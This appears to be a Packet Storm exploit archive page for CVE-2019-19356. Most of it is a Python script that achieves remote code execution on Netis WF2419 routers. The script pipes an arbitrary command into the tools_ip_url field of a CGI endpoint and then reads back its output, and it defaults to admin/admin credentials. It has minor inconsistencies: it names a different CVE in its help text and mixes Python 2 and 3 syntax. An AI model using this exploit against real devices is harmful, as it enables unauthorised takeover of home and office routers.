exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Netis WF2419 2.2.36123 Remote Code Execution

Netis WF2419 2.2.36123 Remote Code Execution
Posted Mar 2, 2020
Authored by Elias Issa

Netis WF2419 version 2.2.36123 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2019-19356
SHA-256 | 22aa5eac15aadbbbe2668ffb88c241e62f80f6a1ddc35e9f7c92e0c007312e6c

Netis WF2419 2.2.36123 Remote Code Execution

Change Mirror Download
# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution 
# Exploit Author: Elias Issa
# Vendor Homepage: http://www.netis-systems.com
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75
# Date: 2020-02-11
# Version: WF2419 V2.2.36123 => V2.2.36123
# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123
# CVE : CVE-2019-19356


# Proof of Concept: python netis_rce.py http://192.168.1.1 "ls"

#!/usr/bin/env python
import argparse
import requests
import json

def exploit(host,cmd):
# Send Payload
headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',
'Content-Type': 'application/x-www-form-urlencoded'}
post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0"
vulnerable_page = host + "/cgi-bin-igd/netcore_set.cgi"
req_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)
print('[+] Payload sent')
try :
json_data = json.loads(req_payload.text)
if json_data[0] == "SUCCESS":
print('[+] Exploit Sucess')
# Get Command Result
print('[+] Getting Command Output\n')
result_page = host + "/cgi-bin-igd/netcore_get.cgi"
post_data = "mode_name=netcore_get&no=no"
req_result = requests.post(result_page, data=post_data, headers=headers_value)
json_data = json.loads(req_result.text)
results = json_data["tools_results"]
print results.replace(';', '\n')
else:
print('[-] Exploit Failed')
except:
print("[!] You might need to login.")

# To be implemented
def login(user, password):
print('To be implemented')

def main():
host = args.host
cmd = args.cmd
user = args.user
password = args.password
#login(user,password)
exploit(host,cmd)

if __name__ == "__main__":
ap = argparse.ArgumentParser(
description="Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]")
ap.add_argument("host", help="URL (Example: http://192.168.1.1).")
ap.add_argument("cmd", help="Command to run.")
ap.add_argument("-u", "--user", help="Admin username (Default: admin).",
default="admin")
ap.add_argument("-p", "--password", help="Admin password (Default: admin).",
default="admin")
args = ap.parse_args()
main()
Login or Register to add favorites

File Archive:

June 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    19 Files
  • 2
    Jun 2nd
    16 Files
  • 3
    Jun 3rd
    28 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    19 Files
  • 7
    Jun 7th
    23 Files
  • 8
    Jun 8th
    11 Files
  • 9
    Jun 9th
    10 Files
  • 10
    Jun 10th
    4 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    27 Files
  • 20
    Jun 20th
    65 Files
  • 21
    Jun 21st
    10 Files
  • 22
    Jun 22nd
    8 Files
  • 23
    Jun 23rd
    6 Files
  • 24
    Jun 24th
    6 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close